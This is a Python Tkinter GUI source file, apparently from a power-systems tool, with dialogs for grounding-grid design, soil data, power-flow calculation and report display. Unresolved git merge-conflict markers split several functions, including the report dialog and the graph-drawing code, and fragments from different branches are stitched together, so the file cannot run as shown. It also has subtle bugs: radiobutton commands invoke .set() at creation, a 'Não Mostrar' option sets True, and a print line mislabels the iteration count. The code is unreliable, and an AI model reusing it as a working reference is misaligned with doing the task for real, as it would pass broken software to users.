frame_teste_malha.grid(row=0, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# LABEL Profundidade das Hastes
label_profundidade_hastes = tk.Label(
master=frame_teste_malha,
text="Profundidade das hastes [m]: ",
font=("Helvetica", 15),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_profundidade_hastes.grid(row=0, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
entry_profundidade_hastes = tk.Entry(
font=("Helvetica", 15),
master=frame_teste_malha,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_profundidade_hastes.focus_set()
entry_profundidade_hastes.grid(row=0, column=1, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# LABEL Profundidade das Hastes
label_iteracoes = tk.Label(
master=frame_teste_malha,
text="Número de iterações: \nQuanto maior, mais preciso o cálculo simples. ",
font=("Helvetica", 14),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_iteracoes.grid(row=1, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
entry_iteracoes = tk.Entry(
font=("Helvetica", 15),
master=frame_teste_malha,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_iteracoes.grid(row=1, column=1, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# BOTÃO ADICIONAR
def __add_butt_salvar():
profundidade = float(entry_profundidade_hastes.get())
print('\n\nProfundidade das hastes = ', profundidade)
iteracoes = int(entry_iteracoes.get())
print('\n\nProfundidade das hastes = ', iteracoes)
print('\n\n\n=========================== TESTE SIMPLES DO PROJETO DA MALHA DE TERRA ======================')
self.__malha.testar_ri_v(profundidade_haste=profundidade, iteracoes=iteracoes, show=True)
if self.__malha.get_teste() is False:
print('\n\n\n======================= TESTE COMPLETO DO PROJETO DA MALHA DE TERRA =====================')
self.__malha.testar_vmalha_vtoq(show=True)
self.__malha.testar_vpsm_vpasso(show=True)
config_testar_malha.destroy()
butt_add_salvar = tk.Button(
master=config_testar_malha,
text="Testar!", font=("Helvetica", 12), height=2, # width=30,
bg="goldenrod",
bd=3,
command=__add_butt_salvar,
anchor=tk.CENTER,
justify=tk.CENTER,
compound=tk.CENTER,
padx=2,
pady=2,
relief=tk.GROOVE,
)
butt_add_salvar.grid(row=1, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
def __malha_terra_add_info(self):
config_info_malha = tk.Toplevel()
config_info_malha.title("Informações de Projeto da Malha de Terra")
config_info_malha.geometry("1100x700")
config_info_malha.wm_iconbitmap("images/logo_pySEP.ico")
config_info_malha["bg"] = "light goldenrod"
frame_info_malha = tk.LabelFrame(
master=config_info_malha,
bg="light goldenrod",
text="Informações de Projeto da Malha de Terra",
font=("Helvetica", 20)
)
frame_info_malha.pack(fill='both', expand=True)
# LABEL ADD Icc
label_add_icc = tk.Label(
master=frame_info_malha,
text="Corrente de curto-circuito [A]: ",
font=("Helvetica", 15),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_add_icc.grid(row=0, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
entry_add_icc = tk.Entry(
font=("Helvetica", 15),
master=frame_info_malha,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_add_icc.focus_set()
entry_add_icc.grid(row=0, column=1, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# LABEL ADD Imalha
label_add_imalha = tk.Label(
master=frame_info_malha,
text="Corrente de malha [A]: ",
font=("Helvetica", 15),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_add_imalha.grid(row=0, column=3, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
entry_add_imalha = tk.Entry(
font=("Helvetica", 15),
master=frame_info_malha,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_add_imalha.grid(row=0, column=4, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# LABEL ADD tempo protecao
label_add_t_protecao = tk.Label(
master=frame_info_malha,
text="Tempo da proteção [s]: ",
font=("Helvetica", 15),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_add_t_protecao.grid(row=1, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
entry_add_t_protecao = tk.Entry(
font=("Helvetica", 15),
master=frame_info_malha,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_add_t_protecao.grid(row=1, column=1, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# LABEL ADD tempo defeito
label_add_t_defeito = tk.Label(
master=frame_info_malha,
text="Tempo do defeito [s]: ",
font=("Helvetica", 15),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_add_t_defeito.grid(row=1, column=3, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
entry_add_t_defeito = tk.Entry(
font=("Helvetica", 15),
master=frame_info_malha,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_add_t_defeito.grid(row=1, column=4, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# LABEL ADD temperatura ambiente
label_add_temp_ambiente = tk.Label(
master=frame_info_malha,
text="Temperatura ambiente [C°]: ",
font=("Helvetica", 15),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_add_temp_ambiente.grid(row=2, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
entry_add_temp_ambiente = tk.Entry(
font=("Helvetica", 15),
master=frame_info_malha,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_add_temp_ambiente.grid(row=2, column=1, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# LABEL ADD temperatura máxima permissível
label_add_temp_max_permissivel = tk.Label(
master=frame_info_malha,
text="Temperatura máxima permissível [C°]: ",
font=("Helvetica", 15),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_add_temp_max_permissivel.grid(row=2, column=3, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
entry_add_temp_max_permissivel = tk.Entry(
font=("Helvetica", 15),
master=frame_info_malha,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_add_temp_max_permissivel.grid(row=2, column=4, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# BOTÃO ADICIONAR
def __add_butt_salvar():
icc = float(entry_add_icc.get())
print('\n\nIcc = ', icc)
imalha = float(entry_add_imalha.get())
print('Imalha = ', imalha)
t_prot = float(entry_add_t_protecao.get())
print('tempo protecao = ', t_prot)
t_def = float(entry_add_t_defeito.get())
print('tempo defeito = ', t_def)
temp_amb = int(entry_add_temp_ambiente.get())
print('temperatura ambiente = ', temp_amb)
temp_max = int(entry_add_temp_max_permissivel.get())
print('temperatura maxima = ', temp_max)
self.__malha.add_icc(i_cc=icc)
self.__malha.add_i_malha(i_malha=imalha)
self.__malha.add_t_protecao(t_protecao=t_prot)
self.__malha.add_t_defeito(t_defeito=t_def)
self.__malha.add_temp_ambiente(temp_ambiente=temp_amb)
self.__malha.add_temp_max_permissivel(temp_max_permissivel=temp_max)
config_info_malha.destroy()
butt_add_salvar = tk.Button(
master=frame_info_malha,
text="Salvar!", font=("Helvetica", 12), height=2, # width=30,
bg="goldenrod",
bd=3,
command=__add_butt_salvar,
anchor=tk.CENTER,
justify=tk.CENTER,
compound=tk.CENTER,
padx=2,
pady=2,
relief=tk.GROOVE,
)
butt_add_salvar.grid(row=3, columnspan=5, padx=5, pady=5)
def __calc_fluxo_plot_tensao(self):
self.__circuito.plot_conv(tensao=True, ang=False)
def __calc_fluxo_plot_angulo(self):
self.__circuito.plot_conv(tensao=False, ang=True)
def __calc_fluxo_perdas(self):
self.__circuito.relatorio(show_tensoes=False, show_correntes=False, show_fluxo=False)
self.__circuito.perdas(show=True)
self.__text_status.set("Perdas do circuito!")
def __calc_fluxo_relatorio(self):
self.__relatorio_fluxo()
self.__text_status.set("Relatório Final!")
def __relatorio_fluxo(self): # Talvez depois colocar os resultados em um toplevel ou algo assim
config_relatorio = tk.Toplevel()
config_relatorio.title("Relatório Final do Fluxo de Potência")
config_relatorio.geometry("460x250")
config_relatorio.wm_iconbitmap("images/logo_pySEP.ico")
config_relatorio["bg"] = "light goldenrod"
frame_relatorio = tk.LabelFrame(
master=config_relatorio,
bg="light goldenrod"
)
frame_relatorio.pack(fill='both', expand=True)
>>>>>>> 7de809c (relatório e perdas)
# TÍTULO DA JANELA
label_titulo = tk.Label(
master=frame_relatorio,
anchor=tk.CENTER,
bg="light goldenrod",
justify=tk.CENTER,
padx=2,
pady=2,
text="Relatório Final do Fluxo de Potência",
font=("Helvetica", 20)
)
label_titulo.grid(row=0, columnspan=6, padx=5, pady=5)
# MOSTRAR TENSÕES: True ou False
__relatorio_tensoes = tk.BooleanVar()
_tensoes_true = tk.Radiobutton(
master=frame_relatorio,
text="Mostrar Tensões: ",
font=("Helvetica", 13),
variable=__relatorio_tensoes,
value=True,
bg="light goldenrod",
command=__relatorio_tensoes.set(True)
)
_tensoes_true.grid(row=2, column=0, sticky=tk.W)
<<<<<<< HEAD
self.__grafo_pos = nx.spring_layout(self.__grafo)
>>>>>>> 29cc7eb (.)
a = self.__teste.add_subplot(111)
a.plot([1, 2, 3, 4, 5, 6, 7], [1, 2, -1, -2, 0, 3, 4])
<<<<<<< HEAD
canvas = FigureCanvasTkAgg(self.__teste, self.__janela)
=======
def __show_grafo(self, a):
self.__frame_grafo.destroy()
self.__frame_grafo = tk.Frame(
master=self.__janela,
bg="light goldenrod"
=======
_tensoes_false = tk.Radiobutton(
master=frame_relatorio,
text=" Não Mostrar Tensões: ",
font=("Helvetica", 13),
variable=__relatorio_tensoes,
value=False,
bg="light goldenrod",
command=__relatorio_tensoes.set(True)
)
_tensoes_false.grid(row=2, column=3, sticky=tk.W)
# MOSTRAR ÂNGULOS: True ou False
__relatorio_corr = tk.BooleanVar()
_correntes_true = tk.Radiobutton(
master=frame_relatorio,
text="Mostrar Correntes",
font=("Helvetica", 13),
variable=__relatorio_corr,
value=True,
bg="light goldenrod",
command=__relatorio_corr.set(False)
)
_correntes_true.grid(row=4, column=0, sticky=tk.W)
_correntes_false = tk.Radiobutton(
master=frame_relatorio,
text="Não Mostrar Correntes",
font=("Helvetica", 13),
variable=__relatorio_corr,
value=False,
bg="light goldenrod",
command=__relatorio_corr.set(False)
>>>>>>> 7de809c (relatório e perdas)
)
_correntes_false.grid(row=4, column=3, sticky=tk.W)
# MOSTRAR FLUXO: True ou False
__relatorio_fluxo = tk.BooleanVar()
_fluxo_true = tk.Radiobutton(
master=frame_relatorio,
text="Mostrar Fluxo",
font=("Helvetica", 13),
variable=__relatorio_fluxo,
value=True,
bg="light goldenrod",
command=__relatorio_fluxo.set(False)
)
_fluxo_true.grid(row=6, column=0, sticky=tk.W)
<<<<<<< HEAD
canvas = FigureCanvasTkAgg(self.__f, master=self.__frame_grafo)
>>>>>>> fbd7d23 (.)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar_grafo = NavigationToolbar2Tk(canvas, self.__janela)
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
def set_toolbar(self, janela_main):
toolbar = tk.Frame(janela_main, bg="goldenrod")
=======
_fluxo_false = tk.Radiobutton(
master=frame_relatorio,
text="Não Mostrar Fluxo",
font=("Helvetica", 13),
variable=__relatorio_fluxo,
value=False,
bg="light goldenrod",
command=__relatorio_fluxo.set(False)
)
_fluxo_false.grid(row=6, column=3, sticky=tk.W)
# BOTÃO ADICIONAR
def __add_butt():
info_tensoes = __relatorio_tensoes.get()
print('Mostrar tensões = ', info_tensoes)
info_corr = __relatorio_corr.get()
print('Mostrar correntes = ', info_corr)
>>>>>>> 7de809c (relatório e perdas)
info_fluxo = __relatorio_fluxo.get()
print('Mostrar Fluxo = ', info_fluxo)
self.__circuito.relatorio(
show_tensoes=info_tensoes,
show_correntes=info_corr,
show_fluxo=info_fluxo
)
print("\n\nRelatório Mostrado! ")
self.__label_logo.destroy()
config_relatorio.destroy()
butt_add = tk.Button(
master=frame_relatorio,
text="Mostrar!", font=("Helvetica", 12), height=2, width=30,
bg="goldenrod",
bd=3,
command=__add_butt,
anchor=tk.CENTER,
justify=tk.CENTER,
compound=tk.CENTER,
padx=2,
pady=2,
relief=tk.GROOVE,
)
butt_add.grid(row=8, columnspan=6, padx=5, pady=5)
def __calc_fluxo(self):
self.__config_fluxo()
self.__text_status.set("Fluxo de potência calculado!")
def __config_fluxo(self):
config_fluxo = tk.Toplevel()
config_fluxo.title("Calcular Fluxo de Potência")
config_fluxo.geometry("460x250")
config_fluxo.wm_iconbitmap("images/logo_pySEP.ico")
config_fluxo["bg"] = "light goldenrod"
frame_config = tk.LabelFrame(
master=config_fluxo,
bg="light goldenrod"
)
frame_config.pack(fill='both', expand=True)
# TÍTULO DA JANELA
label_titulo = tk.Label(
master=frame_config,
anchor=tk.CENTER,
bg="light goldenrod",
justify=tk.CENTER,
padx=2,
pady=2,
text="Calcular Fluxo de Potência",
font=("Helvetica", 20)
)
label_titulo.grid(row=0, columnspan=6, padx=5, pady=5)
# NÚMERO DA BARRA
label_erro_fluxo = tk.Label(
master=frame_config,
text="Erro de convergência: \nExemplo: 1e-2 ou 0.01",
font=("Helvetica", 15),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_erro_fluxo.grid(row=1, column=0, padx=5, pady=5, sticky=tk.W)
entry_erro_fluxo = tk.Entry(
font=("Helvetica", 15),
master=frame_config,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_erro_fluxo.focus_set()
entry_erro_fluxo.grid(row=1, column=3, padx=5, pady=5, sticky=tk.W)
# MOSTRAR ITERAÇÕES: True ou False
__show_iter = tk.BooleanVar()
_iter_true = tk.Radiobutton(
master=frame_config,
text="Mostrar Iterações",
font=("Helvetica", 13),
variable=__show_iter,
value=True,
bg="light goldenrod",
command=__show_iter.set(True)
)
_iter_true.grid(row=2, column=0, sticky=tk.W)
_iter_false = tk.Radiobutton(
master=frame_config,
text="Não Mostrar Iterações",
font=("Helvetica", 13),
variable=__show_iter,
value=False,
bg="light goldenrod",
command=__show_iter.set(False)
)
_iter_false.grid(row=2, column=3, sticky=tk.W)
# BOTÃO ADICIONAR
def __add_butt():
err_flux = float(entry_erro_fluxo.get())
print('\n\nErro iterações = ', err_flux)
show_inter = int(__show_iter.get())
print('Mostrar iterações = ', show_inter)
self.__circuito.calcular_fluxo_pot_nr(
erro=err_flux,
show=show_inter
)
print("\n\nFluxo de Potência calculado! ")
self.__circuito.showBarras()
self.__label_logo.destroy()
config_fluxo.destroy()
butt_add = tk.Button(
master=frame_config,
text="Calcular!", font=("Helvetica", 12), height=2, width=30,
bg="goldenrod",
bd=3,
command=__add_butt,
anchor=tk.CENTER,
justify=tk.CENTER,
compound=tk.CENTER,
padx=2,
pady=2,
relief=tk.GROOVE,
)
butt_add.grid(row=4, columnspan=5, padx=5, pady=5)
def __grafo_add_edge(self, list_linhas):
self.__f = Figure(figsize=(5, 4), dpi=100)
self.__grafo.add_edges_from(list_linhas)
self.__grafo_pos = nx.spring_layout(self.__grafo)
a = self.__f.add_subplot()
self.__show_grafo(a=a)
def __grafo_add_node(self, list_numBar):
self.__f = Figure(figsize=(5, 4), dpi=100)
self.__grafo.add_nodes_from(list_numBar)
self.__grafo_pos = nx.spring_layout(self.__grafo)
a = self.__f.add_subplot()
self.__show_grafo(a=a)
def __show_grafo(self, a):
self.__frame_grafo.destroy()
self.__frame_grafo = tk.Frame(
master=self.__janela,
bg="light goldenrod"
)
self.__frame_grafo.pack(fill='both', expand=True)
pesos = nx.get_edge_attributes(self.__grafo, 'z')
nx.draw_networkx(self.__grafo, self.__grafo_pos, ax=a, font_color='w', font_size=15,
node_size=700, node_color='saddlebrown', node_shape='s',
width=5, edge_color='black')
nx.draw_networkx_edge_labels(self.__grafo, self.__grafo_pos, ax=a, font_size=20,
node_size=700, node_color='saddlebrown', node_shape='s',
width=5, edge_color='black', edge_labels=pesos, font_color='black')
canvas = FigureCanvasTkAgg(self.__f, master=self.__frame_grafo)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar_grafo = NavigationToolbar2Tk(canvas, self.__frame_grafo)
toolbar_grafo.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
def set_toolbar(self, janela_main):
toolbar = tk.Frame(janela_main, bg="goldenrod")
# Adicionar Barra
add_barra = tk.Button(
master=toolbar,
text="Adicionar Novo Nó",
font=("Helvetica", 11),
relief=tk.FLAT,
bg="light goldenrod",
bd=2,
justify=tk.CENTER,
)
add_barra.bind("<Button-1>", self.__add_bar)
add_barra.pack(side=tk.LEFT, padx=2, pady=2)
# Adicionar Linha
add_linha = tk.Button(
master=toolbar,
text="Adicionar Nova Linha",
font=("Helvetica", 11),
relief=tk.FLAT,
bg="light goldenrod",
bd=2,
justify=tk.CENTER,
)
add_linha.bind("<Button-1>", self.__add_lin)
add_linha.pack(side=tk.LEFT, padx=2, pady=2)
# Adicionar Solos
add_solo = tk.Button(
master=toolbar,
text="Informações do solo",
font=("Helvetica", 11),
relief=tk.FLAT,
bg="light goldenrod",
bd=2,
justify=tk.CENTER,
)
add_solo.bind("<Button-1>", self.__add_solo)
add_solo.pack(side=tk.LEFT, padx=2, pady=2)
# Adicionar Malha
add_malha = tk.Button(
master=toolbar,
text="Informações da malha de terra",
font=("Helvetica", 11),
relief=tk.FLAT,
bg="light goldenrod",
bd=2,
justify=tk.CENTER,
)
add_malha.bind("<Button-1>", self.__add_malha)
add_malha.pack(side=tk.LEFT, padx=2, pady=2)
toolbar.pack(side=tk.TOP, fill=tk.X)
def __add_malha(self, event):
self.__config_malha()
self.__text_status.set("Adicionando informações da malha de terra! ")
def __config_malha(self):
config_malha = tk.Toplevel()
config_malha.title("Configurações da malha")
config_malha.geometry("1060x900")
config_malha.wm_iconbitmap("images/logo_pySEP.ico")
config_malha["bg"] = "light goldenrod"
frame_config = tk.Frame(
master=config_malha,
bg="light goldenrod"
)
frame_config.pack(fill='both', expand=True)
# TÍTULO DA JANELA
label_titulo = tk.Label(
master=frame_config,
anchor=tk.CENTER,
bg="light goldenrod",
justify=tk.CENTER,
padx=2,
pady=2,
text="Configurações da malha",
font=("Helvetica", 20)
)
label_titulo.grid(row=0, columnspan=10, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> LABEL Largura da malha
label_malha_largura = tk.Label(
master=frame_config,
text="Largura da malha [m]: ",
font=("Helvetica", 12),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_malha_largura.grid(row=1, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> ENTRY Largura da malha
entry_malha_largura = tk.Entry(
font=("Helvetica", 12),
master=frame_config,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_malha_largura.focus_set()
entry_malha_largura.grid(row=1, column=1, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> LABEL Comprimento da malha
label_malha_comprimento = tk.Label(
master=frame_config,
text="Comprimento da malha [m]: ",
font=("Helvetica", 12),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_malha_comprimento.grid(row=1, column=2, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> ENTRY Comprimento da malha
entry_malha_comprimento = tk.Entry(
font=("Helvetica", 12),
master=frame_config,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_malha_comprimento.grid(row=1, column=3, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> LABEL Espaçamento da largura da malha
label_malha_esp_larg = tk.Label(
master=frame_config,
text="Espaçamento de cada haste\nno eixo X [0.05 a 0.1]: ",
font=("Helvetica", 12),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_malha_esp_larg.grid(row=2, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> ENTRY Espaçamento da largura da malha
entry_malha_esp_larg = tk.Entry(
font=("Helvetica", 12),
master=frame_config,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_malha_esp_larg.grid(row=2, column=1, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> LABEL Espaçamento do comprimento da malha
label_malha_esp_compr = tk.Label(
master=frame_config,
text="Espaçamento de cada haste\nno eixo Y [0.05 a 0.1]: ",
font=("Helvetica", 12),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_malha_esp_compr.grid(row=2, column=2, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> ENTRY Espaçamento do comprimento da malha
entry_malha_esp_compr = tk.Entry(
font=("Helvetica", 12),
master=frame_config,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_malha_esp_compr.grid(row=2, column=3, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
########################################################################################################################
_frame_profundidade = tk.Frame(
master=frame_config,
bg="light goldenrod",
padx=2,
pady=2,
)
_frame_profundidade.grid(row=3, columnspan=10, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> LABEL profundidade da malha
label_malha_profundidade = tk.Label(
master=_frame_profundidade,
text="Profundidade da malha [m]:",
font=("Helvetica", 12),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_malha_profundidade.pack(fill=tk.BOTH, side=tk.LEFT, expand=True)
# Informações --> ENTRY profundidade da malha
entry_malha_profundidade = tk.Entry(
font=("Helvetica", 12),
master=_frame_profundidade,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_malha_profundidade.pack(fill=tk.BOTH, side=tk.LEFT, expand=True)
########################################################################################################################
_labelframe_periferia = tk.LabelFrame(
master=frame_config,
text="Hastes na periferia? ", font=("Helvetica", 14),
bg="light goldenrod",
padx=2,
pady=2,
)
_labelframe_periferia.grid(row=4, columnspan=10, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# HASTES NA PERIFERIA?
__hastes_periferia = tk.BooleanVar()
_periferia_true = tk.Radiobutton(
master=_labelframe_periferia,
text="Sim: ",
font=("Helvetica", 13),
variable=__hastes_periferia,
value=True,
bg="light goldenrod",
command=__hastes_periferia.set(True)
)
_periferia_true.pack(fill=tk.BOTH, side=tk.LEFT, expand=True)
_periferia_false = tk.Radiobutton(
master=_labelframe_periferia,
text="Não: ",
font=("Helvetica", 13),
variable=__hastes_periferia,
value=False,
bg="light goldenrod",
command=__hastes_periferia.set(True)
)
_periferia_false.pack(fill=tk.BOTH, side=tk.LEFT, expand=True)
_frame_dimensoes = tk.Frame(
master=frame_config,
bg="light goldenrod",
padx=2,
pady=2,
)
_frame_dimensoes.grid(row=5, columnspan=10, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
_frame_grafo_malha = tk.Frame(
master=frame_config,
bg="light goldenrod",
padx=2,
pady=2,
)
_frame_grafo_malha.grid(row=6, columnspan=10, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
def __show_grafo(a, grafo, pos, f):
_frame_grafo_malha = tk.Frame(
master=frame_config,
bg="light goldenrod",
padx=2,
pady=2,
)
_frame_grafo_malha.grid(row=6, columnspan=10, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
nx.draw(grafo, pos, node_color='black', ax=a)
canvas = FigureCanvasTkAgg(f, master=_frame_grafo_malha)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar_grafo = NavigationToolbar2Tk(canvas, _frame_grafo_malha)
toolbar_grafo.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
# BOTÃO ADICIONAR Adicionar dimensões
def __add_butt_dimensoes():
largura = float(entry_malha_largura.get())
print('\n\nlargura malha = ', largura)
comprimento = float(entry_malha_comprimento.get())
print('\n\ncomprimento malha = ', comprimento)
esp_larg = float(entry_malha_esp_larg.get())
print('\n\nEspaçamento malha largura = ', esp_larg)
esp_compr = float(entry_malha_esp_compr.get())
print('\n\nEspaçamento malha comprimento = ', esp_compr)
profundidade = float(entry_malha_profundidade.get())
print('\n\nprofundidade malha = ', profundidade)
periferia = bool(__hastes_periferia.get())
print('\n\nHastes na periferia? ', periferia)
if periferia is True:
periferia_true = True
periferia_false = False
else:
periferia_true = False
periferia_false = True
self.__malha.add_dimensoes(
largura=largura,
comprimento=comprimento,
esp_larg=esp_larg,
esp_compr=esp_compr,
profundidade_malha=profundidade,
malha_com_hastes_na_periferia=periferia_true,
malha_sem_hastes_na_periferia=periferia_false
)
__grafo_malha = nx.Graph()
f = Figure(figsize=(5, 4), dpi=100)
a = f.add_subplot()
na = int(largura * esp_larg)
nb = int(comprimento * esp_compr)
nodes = []
for i in range(na * nb):
nodes.append(str(i + 1))
pos = dict()
cont = 0
for i in range(nb):
for j in range(na):
pos[nodes[cont]] = (j + 1, i + 1)
cont += 1
__grafo_malha.add_nodes_from(nodes)
edges = []
for i in range(na):
edges.append(
(nodes[i], nodes[(na * nb) - na + i])
)
for i in range(nb):
edges.append(
(nodes[i * na], nodes[na + (i * na) - 1])
)
__grafo_malha.add_edges_from(edges)
_frame_grafo_malha.destroy()
__show_grafo(a=a, grafo=__grafo_malha, pos=pos, f=f)
butt_add_dimensoes = tk.Button(
master=_frame_dimensoes,
text="Adicionar informações e mostrar malha de terra!", font=("Helvetica", 12), height=1, # width=10,
bg="goldenrod",
bd=3,
command=__add_butt_dimensoes,
anchor=tk.CENTER,
justify=tk.CENTER,
compound=tk.CENTER,
padx=2,
pady=2,
relief=tk.GROOVE,
)
butt_add_dimensoes.pack(fill=tk.BOTH, side=tk.LEFT, expand=True)
# BOTÃO Salvar informações
def __add_butt_salvar_malha():
config_malha.destroy()
butt_add_dimensoes = tk.Button(
master=frame_config,
text="Salvar informações da malha e sair!", font=("Helvetica", 12), height=1, # width=10,
bg="goldenrod",
bd=3,
command=__add_butt_salvar_malha,
anchor=tk.CENTER,
justify=tk.CENTER,
compound=tk.CENTER,
padx=2,
pady=2,
relief=tk.GROOVE,
)
butt_add_dimensoes.grid(row=7, columnspan=10, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
########################################################################################################################
#######################################################################################################
def __add_solo(self, event):
self.__config_solo()
self.__text_status.set("Adicionando informações do solo! ")
def __config_solo(self):
config_solo = tk.Toplevel()
config_solo.title("Configurações do solo")
config_solo.geometry("1060x900")
config_solo.wm_iconbitmap("images/logo_pySEP.ico")
config_solo["bg"] = "light goldenrod"
frame_config = tk.Frame(
master=config_solo,
bg="light goldenrod"
)
frame_config.pack(fill='both', expand=True)
# TÍTULO DA JANELA
label_titulo = tk.Label(
master=frame_config,
anchor=tk.CENTER,
bg="light goldenrod",
justify=tk.CENTER,
padx=2,
pady=2,
text="Configurações do solo",
font=("Helvetica", 20)
)
label_titulo.grid(row=0, columnspan=8, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# BOTÃO SALVAR INFORMAÇÕES SOLOS
def __add_butt():
config_solo.destroy()
butt_salvar_solos = tk.Button(
master=frame_config,
text="Salvar informações! ", font=("Helvetica", 11), height=2, width=10,
bg="goldenrod",
bd=3,
command=__add_butt,
anchor=tk.CENTER,
justify=tk.CENTER,
compound=tk.CENTER,
padx=2,
pady=2,
relief=tk.GROOVE,
)
butt_salvar_solos.grid(row=0, column=8, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> LABEL Brita
label_brita = tk.Label(
master=frame_config,
text="Adicionar Informações da camada de Brita ",
font=("Helvetica", 20),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_brita.grid(row=1, columnspan=10, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> LABEL Brita PROFUNDIDADE
label_brita_profundidade = tk.Label(
master=frame_config,
text="Profundidade [m]: ",
font=("Helvetica", 12),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_brita_profundidade.grid(row=2, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> ENTRY Brita PROFUNDIDADE
entry_brita_profundidade = tk.Entry(
font=("Helvetica", 12),
master=frame_config,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_brita_profundidade.focus_set()
entry_brita_profundidade.grid(row=2, column=2, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> LABEL Brita RESISTIVIDADE
label_brita_resistividade = tk.Label(
master=frame_config,
text="Resistividade [Ohm.m]: ",
font=("Helvetica", 12),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_brita_resistividade.grid(row=2, column=4, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> ENTRY Brita RESISTIVIDADE
entry_brita_resistividade = tk.Entry(
font=("Helvetica", 12),
master=frame_config,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_brita_resistividade.grid(row=2, column=6, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
